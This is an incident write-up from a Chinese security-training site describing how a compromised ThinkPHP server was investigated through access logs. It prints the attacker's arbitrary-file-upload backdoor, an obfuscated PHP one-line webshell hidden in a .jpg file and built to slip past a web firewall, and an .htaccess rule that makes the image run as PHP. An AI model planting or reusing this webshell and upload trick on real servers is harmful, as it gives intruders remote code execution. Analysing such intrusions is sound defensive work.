天创培训:您身边的信息安全培训专家!
栏目列表
开班计划
2020年4月CISP直播班
主讲老师   张老师、王老师等
开课时间   4月
培训方式   网络课程
授课天次   培训5天+考试半天
上课时间   4月
课程介绍 在线报名
技术中心您当前位置:首页 > 资源专区 > 技术中心

一次服务器被入侵后的一些措施

作者:天创培训  来源:px.tcnet.com.cn  更新时间:2016-09-05  关键词:服务器,入侵

环境:wamp 套件. 2003系统 安装安全狗套件。

 

程序:thinkphp 自定义开发程序...外买的。

 

业务员反应后台有人乱删除数据,怀疑让入侵。

 

随即登上服务器查看日志...

 

通过查看日志:锁定可疑IP:45.127.97.180  香港...

 

45.127.97.180 - - [16/Mar/2016:08:49:29 +0800] "GET /Public/uploadify.php HTTP/1.1" 200 969 //查看服务器是否存在uploadify.php 

45.127.97.180 - - [16/Mar/2016:08:49:43 +0800] "GET /Public/ HTTP/1.1" 403 209

45.127.97.180 - - [16/Mar/2016:08:49:47 +0800] "GET /Public/file.php HTTP/1.1" 404 1118

45.127.97.180 - - [16/Mar/2016:08:50:20 +0800] "POST /Public/uploadify.php HTTP/1.1" 200 -

45.127.97.180 - - [16/Mar/2016:08:50:29 +0800] "POST /Public/uploadify.php HTTP/1.1" 200 -

45.127.97.180 - - [16/Mar/2016:08:50:38 +0800] "GET /Public/lib.jpg HTTP/1.1" 200 1599

uploadify.php //后门上传文件

 

 

$file=$_FILES['Filedata'];

$path = isset($_REQUEST['path'])&&!empty($_REQUEST['path'])?daddslashes($_REQUEST['path']):'';

if(!$file['tmp_name']||!$file['name']||!$file['size']){

    return false;

}

$path=!empty($path)&&'/'!=substr($path,-1,1)?$path.'/':$path;

$save_name=addslashes($file['name']);

if(!move_uploaded_file($file['tmp_name'],$path.$save_name)){

    WriteErrMsg('文件上传过程中发生错误,请重新上传');

}

上传lib.jpg 文件

 

复制代码

if(isset($_REQUEST['newuserid'])){ 

$i[0] = 'asse'.'rt'; 

$array[] = $i; 

$key=str_replace("yBZ","",$_POST['ad']);

$i[1]=base64_decode($key);

$array[0][0]($i[1]);

}

复制代码

 思考jpg文件如何能够执行,httpd.conf .htaccess配置文件

 

存在htaccess  因为存在任意文件上传,过狗的一句话很有可能爆路径,上传.htacccess支持jpg 将于php程序运行。

 

<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>

 




推荐阅读

网站首页 |  关于天创 |  课程体系 |  最新动态 |  联系我们 |  网站地图 |  二维码
版权所有:江苏天创科技有限公司 苏ICP备16028135号-2
苏州总部地址:江苏省苏州市十梓街327号 电话:0512-65129087 传真:0512-65157410 邮编:215000
南京分公司地址:南京珠江路88号新世界中心A座 电话:025-84533276 传真:025-84533286 邮编:210000